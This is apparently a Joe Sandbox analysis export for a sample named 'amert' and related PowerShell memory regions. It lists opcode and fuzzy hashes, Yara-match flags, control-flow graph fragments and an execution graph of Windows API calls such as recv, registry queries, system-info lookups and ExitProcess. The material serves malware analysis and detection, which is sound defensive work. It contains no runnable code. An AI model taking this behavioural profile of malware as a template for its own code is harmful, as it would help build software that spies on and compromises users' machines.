                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 399058d9cb95cac132d6add329c7568897033c03962f17ab5dcd5f16ac80094d
                                                                                                                                                                                                                                        • Instruction ID: b1f11e5b7e9fd7398c2b5df723874fee816feae6a166035ceb578ea69d89923c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 399058d9cb95cac132d6add329c7568897033c03962f17ab5dcd5f16ac80094d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2471E621D0FBC54FE766A738186A6A47FB0EF52650F1D01FBC099CB1E3EA18584E8356
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6c3d6257d29c8b894d816da0e288859105b8c2b5a470a244e659e305db5ba1eb
                                                                                                                                                                                                                                        • Instruction ID: 5c22b2b0c1b4dcc4cb6d71912e6f7119dd5edc29f621a1a4fbfa23ef3e763516
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c3d6257d29c8b894d816da0e288859105b8c2b5a470a244e659e305db5ba1eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5411A32F1DE595FE7A9AA1C78122B873C1EF85660F4802BBD55FC3182DF15AC0646C9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e643aab23ec5501894ab9af93392d920f599ac49e4e04b73f55089feb4f233e6
                                                                                                                                                                                                                                        • Instruction ID: 236a8761ff3dec52721da9752d4dd3c285656ec8bfcbc279e1a1e986eda65501
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e643aab23ec5501894ab9af93392d920f599ac49e4e04b73f55089feb4f233e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4311562E1CD4A1FE3A8EA6C945A67573C1EF58791F4001BED48EC32D3DE08A8468289
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c854a27b1ac37ec01c40c16d801f36718bb65cacdf8e1ddc241b140ee2afeeb4
                                                                                                                                                                                                                                        • Instruction ID: e5c8bff8948f7c141cc8728bdfc12d43cdd71b1818ce9721c6a185f0fdc72a57
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c854a27b1ac37ec01c40c16d801f36718bb65cacdf8e1ddc241b140ee2afeeb4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5821712190FBC15FD36257385C696A57FB0EF13260F0942EBC0A6CB1E3DA18684AC766
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a695dcf752f4c7f958b898c53f14751034ea141fd685c3a86080328fa207b41b
                                                                                                                                                                                                                                        • Instruction ID: 21c0ceff46724caa1bfd111826551c52603388a8ca2ac089344751fb32fd2f42
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a695dcf752f4c7f958b898c53f14751034ea141fd685c3a86080328fa207b41b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC11CC32F1DE155FE3A9A51C34122B873C2EF85671F4802BAD45FC3286DE156C06058D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction ID: 6037ff74da3c8272be87e1aa7ead4f420cb197e537937a16625ab783ce59eaa1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD01A73010CB0C4FD744EF0CE051AA6B3E0FB95360F10052DE58AC3651DB36E882CB45
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:5.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:546
                                                                                                                                                                                                                                        Total number of Limit Nodes:22
36ce00 6 API calls 12742->12743 12745 36eb1c __dosmaperr 12743->12745 12744 36ed60 shared_ptr 12745->12744 12746 398376 5 API calls 12745->12746 12747 36efb8 std::_Xinvalid_argument 12746->12747 12751 36ce36 shared_ptr 12748->12751 12749 36ce00 6 API calls 12753 36dc66 shared_ptr 12749->12753 12750 36d369 shared_ptr 12750->12737 12751->12749 12751->12750 12752 36de62 shared_ptr 12752->12737 12753->12752 12754 36ce00 6 API calls 12753->12754 12756 36df43 shared_ptr 12754->12756 12755 36e015 shared_ptr 12755->12737 12756->12755 12757 396056 RtlAllocateHeap 12756->12757 12758 36e1c1 12757->12758 12759 36ce00 6 API calls 12758->12759 12761 36eb1c __dosmaperr 12759->12761 12760 36ed60 shared_ptr 12760->12737 12761->12760 12762 398376 5 API calls 12761->12762 12763 36efb8 std::_Xinvalid_argument 12762->12763 12764 36c990 recv 12765 36c9f2 recv 12764->12765 12766 36ca27 recv 12765->12766 12767 36ca61 12766->12767 12768 36cb83 12767->12768 12769 37c00c GetSystemTimePreciseAsFileTime 12767->12769 12770 36cbbe 12769->12770 12771 37bbca 7 API calls 12770->12771 12772 36cc28 12771->12772 12226 378130 12227 37818a 12226->12227 12233 379510 12227->12233 12231 378239 std::_Throw_future_error 12232 3781cc 12246 379850 12233->12246 12235 379545 12250 362bc0 12235->12250 12237 379576 12259 3798d0 12237->12259 12239 3781b4 12239->12232 12240 3642d0 12239->12240 12241 37b83f InitOnceExecuteOnce 12240->12241 12242 3642ea 12241->12242 12243 3642f1 12242->12243 12244 3965e8 6 API calls 12242->12244 12243->12231 12245 364304 12244->12245 12247 37986c 12246->12247 12264 37bfeb 12247->12264 12249 379877 12249->12235 12251 362bfd 12250->12251 12282 37b83f 12251->12282 12253 362c31 12253->12237 12254 362c26 12254->12253 12256 362c68 12254->12256 12285 37b857 12254->12285 12292 362320 12256->12292 12263 37994f shared_ptr 12259->12263 12261 3799b8 12262 37999b 12262->12239 12263->12261 12403 379b70 12263->12403 12267 37bd35 12264->12267 12266 37bffb 12266->12249 12268 37bd4b 12267->12268 12269 
37bd41 12267->12269 12268->12266 12270 37bd1e 12269->12270 12271 37bcfe 12269->12271 12280 37c66a 12270->12280 12271->12268 12276 37c635 12271->12276 12274 37bd30 12274->12266 12277 37c643 InitializeCriticalSectionEx 12276->12277 12278 37bd17 12276->12278 12277->12278 12278->12266 12281 37c67f RtlInitializeConditionVariable 12280->12281 12281->12274 12295 37c591 12282->12295 12286 37b863 std::_Throw_future_error 12285->12286 12287 37b8d3 12286->12287 12288 37b8ca 12286->12288 12305 3629c0 12287->12305 12299 37b7df 12288->12299 12291 37b8cf 12291->12256 12398 37af36 12292->12398 12294 362352 12296 37c59f InitOnceExecuteOnce 12295->12296 12298 37b852 12295->12298 12296->12298 12298->12254 12300 37c591 InitOnceExecuteOnce 12299->12300 12301 37b7f7 12300->12301 12302 37b7fe 12301->12302 12319 3965e8 12301->12319 12302->12291 12304 37b807 12304->12291 12306 37b83f InitOnceExecuteOnce 12305->12306 12310 3629d4 12306->12310 12307 3629df 12307->12291 12308 3983e9 __cftof 5 API calls 12309 396623 12308->12309 12311 396640 12309->12311 12312 396632 12309->12312 12310->12307 12310->12308 12314 3962ba 5 API calls 12311->12314 12313 396696 6 API calls 12312->12313 12315 39663c 12313->12315 12316 39665a 12314->12316 12315->12291 12317 396696 6 API calls 12316->12317 12318 39666e __freea 12316->12318 12317->12318 12318->12291 12320 3965f4 12319->12320 12321 3983e9 __cftof 5 API calls 12320->12321 12322 396623 12321->12322 12323 396640 12322->12323 12324 396632 12322->12324 12339 3962ba 12323->12339 12331 396696 12324->12331 12327 39663c 12327->12304 12328 39665a 12329 396696 6 API calls 12328->12329 12330 39666e __freea 12328->12330 12329->12330 12330->12304 12332 3966a4 __cftof __dosmaperr 12331->12332 12333 3966c1 12331->12333 12332->12327 12334 396735 12333->12334 12335 396727 12333->12335 12338 3966e7 __cftof __dosmaperr 12333->12338 12348 396774 12334->12348 12342 3967fe 12335->12342 12338->12327 12340 396237 __cftof 5 API calls 12339->12340 12341 3962cc 12340->12341 
12341->12328 12343 396825 12342->12343 12345 396853 12343->12345 12347 396894 __dosmaperr 12343->12347 12356 396b74 12343->12356 12345->12347 12360 396ac6 12345->12360 12347->12338 12385 396d11 12348->12385 12350 396782 12351 396787 __dosmaperr 12350->12351 12352 396ac6 5 API calls 12350->12352 12351->12338 12353 3967a0 12352->12353 12354 396b74 RtlAllocateHeap 12353->12354 12355 3967bf 12354->12355 12355->12338 12357 396b8d 12356->12357 12359 396ba1 __dosmaperr 12357->12359 12370 39ae69 12357->12370 12359->12345 12362 396adc _wcsrchr 12360->12362 12361 396b53 12361->12347 12362->12361 12374 39b2e5 12362->12374 12364 396b20 12364->12361 12365 39b2e5 5 API calls 12364->12365 12366 396b31 12365->12366 12366->12361 12367 39b2e5 5 API calls 12366->12367 12368 396b42 12367->12368 12368->12361 12369 39b2e5 5 API calls 12368->12369 12369->12361 12371 39ae93 12370->12371 12372 39cff0 RtlAllocateHeap 12371->12372 12373 39aeaf __dosmaperr __freea 12371->12373 12372->12373 12373->12359 12375 39b2f3 12374->12375 12378 39b2f9 __cftof __dosmaperr 12375->12378 12379 39b32e 12375->12379 12377 39b329 12377->12364 12378->12364 12380 39b358 12379->12380 12382 39b33e __cftof __dosmaperr 12379->12382 12381 396237 __cftof 5 API calls 12380->12381 12380->12382 12384 39b382 12381->12384 12382->12377 12383 39b2a6 GetPEB ExitProcess RtlAllocateHeap GetPEB RtlAllocateHeap 12383->12384 12384->12382 12384->12383 12386 396d35 12385->12386 12388 396d3b 12386->12388 12389 396a33 12386->12389 12388->12350 12390 396a3f __dosmaperr 12389->12390 12395 39b17c 12390->12395 12392 396a65 12392->12388 12393 396a57 __dosmaperr 12393->12392 12394 39b17c RtlAllocateHeap 12393->12394 12394->12392 12396 39afdf RtlAllocateHeap 12395->12396 12397 39b195 12396->12397 12397->12393 12399 37af51 std::_Throw_future_error 12398->12399 12400 3983e9 __cftof 5 API calls 12399->12400 12402 37afb8 __cftof 12399->12402 12401 37afff 12400->12401 12402->12294 12404 379bf0 12403->12404 12410 376ab0 12404->12410 12406 379c2c 
shared_ptr 12407 379e1e shared_ptr 12406->12407 12418 363dc0 12406->12418 12407->12262 12409 379e06 12409->12262 12411 376af1 12410->12411 12424 363850 12411->12424 12413 376d26 12413->12406 12414 376b8d 12414->12413 12415 37bfeb __Mtx_init_in_situ 2 API calls 12414->12415 12416 376ce1 12415->12416 12429 362da0 12416->12429 12419 363e28 12418->12419 12423 363dfe 12418->12423 12420 363e38 12419->12420 12503 362ae0 12419->12503 12420->12409 12423->12409 12425 37bfeb __Mtx_init_in_situ 2 API calls 12424->12425 12426 363887 12425->12426 12427 37bfeb __Mtx_init_in_situ 2 API calls 12426->12427 12428 3638c6 12427->12428 12428->12414 12430 362de6 12429->12430 12431 362e5e GetCurrentThreadId 12429->12431 12467 37c00c 12430->12467 12432 362e74 12431->12432 12449 362ecf 12431->12449 12438 37c00c GetSystemTimePreciseAsFileTime 12432->12438 12432->12449 12435 362efe 12470 37bbca 12435->12470 12437 362f04 12440 37bbca 7 API calls 12437->12440 12442 362e99 12438->12442 12439 362dfd __Mtx_unlock 12439->12437 12441 362e4f 12439->12441 12440->12442 12441->12431 12441->12449 12443 37bbca 7 API calls 12442->12443 12444 362ea0 __Mtx_unlock 12442->12444 12443->12444 12445 37bbca 7 API calls 12444->12445 12446 362eb8 __Cnd_broadcast 12444->12446 12445->12446 12447 37bbca 7 API calls 12446->12447 12446->12449 12448 362f1c 12447->12448 12450 37c00c GetSystemTimePreciseAsFileTime 12448->12450 12449->12413 12459 362f60 shared_ptr __Mtx_unlock 12450->12459 12451 3630a5 12452 37bbca 7 API calls 12451->12452 12453 3630ab 12452->12453 12454 37bbca 7 API calls 12453->12454 12455 3630b1 12454->12455 12456 37bbca 7 API calls 12455->12456 12464 363073 __Mtx_unlock 12456->12464 12457 363087 12457->12413 12458 37bbca 7 API calls 12460 3630bd 12458->12460 12459->12451 12459->12453 12459->12457 12461 363012 GetCurrentThreadId 12459->12461 12461->12457 12462 36301b 12461->12462 12462->12457 12463 37c00c GetSystemTimePreciseAsFileTime 12462->12463 12465 36303f 12463->12465 12464->12457 12464->12458 
12465->12451 12465->12455 12465->12464 12474 37b6ac 12465->12474 12477 37bdb2 12467->12477 12469 362df2 12469->12435 12469->12439 12471 37bbf2 12470->12471 12472 37bbd4 12470->12472 12471->12471 12472->12471 12494 37bbf7 12472->12494 12497 37b4d2 12474->12497 12476 37b6bc 12476->12465 12478 37be08 12477->12478 12480 37bdda 12477->12480 12478->12480 12483 37c8cb 12478->12483 12480->12469 12481 37be5d __Xtime_diff_to_millis2 12481->12480 12482 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12481->12482 12482->12481 12484 37c8da 12483->12484 12486 37c8e7 __aulldvrm 12483->12486 12484->12486 12487 37c8a4 12484->12487 12486->12481 12490 37c54a 12487->12490 12491 37c567 12490->12491 12492 37c55b GetSystemTimePreciseAsFileTime 12490->12492 12491->12486 12492->12491 12495 3629c0 7 API calls 12494->12495 12496 37bc0e std::_Throw_future_error 12495->12496 12496->12472 12498 37b4fc 12497->12498 12499 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12498->12499 12502 37b504 __Xtime_diff_to_millis2 12498->12502 12500 37b52f __Xtime_diff_to_millis2 12499->12500 12501 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12500->12501 12500->12502 12501->12502 12502->12476 12504 362aee 12503->12504 12510 37b1a7 12504->12510 12506 362b22 12507 362b29 12506->12507 12516 362b60 12506->12516 12507->12409 12509 362b38 std::_Throw_future_error 12511 37b1b4 12510->12511 12515 37b1d3 Concurrency::details::_Reschedule_chore 12510->12515 12519 37c4d7 12511->12519 12513 37b1c4 12513->12515 12521 37b17e 12513->12521 12515->12506 12527 37b15b 12516->12527 12518 362b92 shared_ptr 12518->12509 12520 37c4f2 CreateThreadpoolWork 12519->12520 12520->12513 12522 37b187 Concurrency::details::_Reschedule_chore 12521->12522 12525 37c72c 12522->12525 12524 37b1a1 12524->12515 12526 37c741 TpPostWork 12525->12526 12526->12524 12528 37b167 12527->12528 12530 37b177 12527->12530 12528->12530 12531 37c3d8 12528->12531 12530->12518 12532 37c3ed TpReleaseWork 12531->12532 12532->12530 12714 378d40 12715 378d55 
12714->12715 12719 378d93 12714->12719 12720 37ca76 12715->12720 12717 378d5f 12717->12719 12724 37ca2c 12717->12724 12722 37ca86 12720->12722 12721 37ca8f 12721->12717 12722->12721 12728 37cafe 12722->12728 12726 37ca3c 12724->12726 12725 37cae4 12725->12719 12726->12725 12727 37cae0 RtlWakeAllConditionVariable 12726->12727 12727->12719 12729 37cb0c SleepConditionVariableCS 12728->12729 12731 37cb25 12728->12731 12729->12731 12731->12722 12709 396371 12710 396389 12709->12710 12711 39637f 12709->12711 12712 3962ba 5 API calls 12710->12712 12713 3963a3 __freea 12712->12713 12773 37b28e 12774 37b115 8 API calls 12773->12774 12775 37b2b6 12774->12775 12776 37b078 8 API calls 12775->12776 12777 37b2cf 12776->12777 12533 37b219 12540 37b115 12533->12540 12535 37b266 12552 37b078 12535->12552 12536 37b241 Concurrency::details::_Reschedule_chore 12536->12535 12548 37c50e 12536->12548 12539 37b27e 12541 37b121 Concurrency::details::_Reschedule_chore 12540->12541 12542 37c00c GetSystemTimePreciseAsFileTime 12541->12542 12543 37b152 12541->12543 12544 37b136 12542->12544 12543->12536 12562 3629f0 12544->12562 12546 37b13c __Mtx_unlock 12547 3629f0 7 API calls 12546->12547 12547->12543 12549 37c52c 12548->12549 12550 37c51c TpCallbackUnloadDllOnCompletion 12548->12550 12549->12535 12550->12549 12553 37b084 Concurrency::details::_Reschedule_chore 12552->12553 12554 37b0de 12553->12554 12555 37c00c GetSystemTimePreciseAsFileTime 12553->12555 12554->12539 12556 37b099 12555->12556 12557 3629f0 7 API calls 12556->12557 12558 37b09f __Mtx_unlock 12557->12558 12559 3629f0 7 API calls 12558->12559 12560 37b0bc __Cnd_broadcast 12559->12560 12560->12554 12561 3629f0 7 API calls 12560->12561 12561->12554 12563 3629fc 12562->12563 12564 3629fa 12562->12564 12565 37bbca 7 API calls 12563->12565 12564->12546 12566 362a02 ___std_exception_copy 12565->12566 12566->12546

Control-flow Graph

control_flow_graph 550 395e8b-395e98 call 399b02 553 395eba-395ecc call 395ecd ExitProcess 550->553 554 395e9a-395ea8 GetPEB 550->554 554->553 556 395eaa-395eb9 554->556 556->553
APIs
• ExitProcess.KERNEL32(00000000,?,00395E8A,?,?,00000000,?), ref: 00395EC7
Memory Dump Source
• Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_360000_amert.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 42a8de1e29e87ba29efcf3e187c84ad4d702fad603abb68486fb5eacfbbeb98d
• Instruction ID: 34dd0e55c916d3d2e71873f65e7609b4ebd213d066f08c8fe4abf08691c682c5
• Opcode Fuzzy Hash: 42a8de1e29e87ba29efcf3e187c84ad4d702fad603abb68486fb5eacfbbeb98d
• Instruction Fuzzy Hash: 0FE08C30802648AFCE27BB15D915A8E3B1AEF11346F114805FC084A222CF7AFE82CA80
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 0036535D
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,?), ref: 0036538B
• RegCloseKey.KERNELBASE(?), ref: 00365397
Memory Dump Source
• Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_360000_amert.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 3863a3c6d7be9beb69b2804c1158b6f9c5c2f039ac13be15bfbe58a0024d5356
• Instruction ID: 230fef93c7b9d59d65eebc6f95785d4a86234f49c20bc3d2654679cd3184443a
• Opcode Fuzzy Hash: 3863a3c6d7be9beb69b2804c1158b6f9c5c2f039ac13be15bfbe58a0024d5356
• Instruction Fuzzy Hash: DB41E4B16101089FEB25CF14CC41BEE77B9EB45704F1086ADF919972C1DB75AAC48BA4
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00366D13
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                                                                                                        • Opcode ID: da97ba8c73a15d4beec473ac58151c988ff3c7042382b6b616481361df08b7b2
                                                                                                                                                                                                                                        • Instruction ID: 5c7bf30ab9d179878767eaf03c9c0463d269ee882a063a16d0ef07c39315dab3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da97ba8c73a15d4beec473ac58151c988ff3c7042382b6b616481361df08b7b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72122970E042049BDF26EB28CD467AD7775EB42314F94829CE819AB3C6DB355E808BD2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00369EB8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: c1cb2d0674b4ba37f4c5656c97cce0e411b6f22f5a1c0ad3f9b9f27932c49acf
                                                                                                                                                                                                                                        • Instruction ID: 5704a25f1fb792b62a39a38033f848a4a488ddf90d348b806eb117b9bcd273bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1cb2d0674b4ba37f4c5656c97cce0e411b6f22f5a1c0ad3f9b9f27932c49acf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2732BD71A102189FDB29CF28CC89BDDB7B5EF49304F1085D8E409AB295DB75AE84CF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 534 39cff0-39cffb 535 39d009-39d00f 534->535 536 39cffd-39d007 534->536 538 39d028-39d039 RtlAllocateHeap 535->538 539 39d011-39d012 535->539 536->535 537 39d03d-39d048 call 396e40 536->537 543 39d04a-39d04c 537->543 540 39d03b 538->540 541 39d014-39d01b call 3995bb 538->541 539->538 540->543 541->537 547 39d01d-39d026 call 398633 541->547 547->537 547->538
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0039A77F,?,?,00396277,?,00000000,?,?,00396EAB,?,00000000), ref: 0039D032
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 560 367540-367544 561 367546 560->561 562 367548-367552 GetFileAttributesA 560->562 561->562 563 367554-367556 562->563 564 36755b-36755d 562->564 563->564 565 367558-36755a 563->565
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0036C434), ref: 00367549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2839016933.0000000000361000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_360000_amert.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 566 4fc02e2-4fc02e9 567 4fc02eb-4fc0486 566->567 568 4fc0284-4fc02b5 566->568 589 4fc048d-4fc0503 567->589 571 4fc02c5 568->571 571->571
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: C^%
                                                                                                                                                                                                                                        • API String ID: 0-918525554
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        control_flow_graph 595 4fc02ba-4fc0486 614 4fc048d-4fc0503 595->614
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2875520015.0000000004FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_4fc0000_amert.jbxd
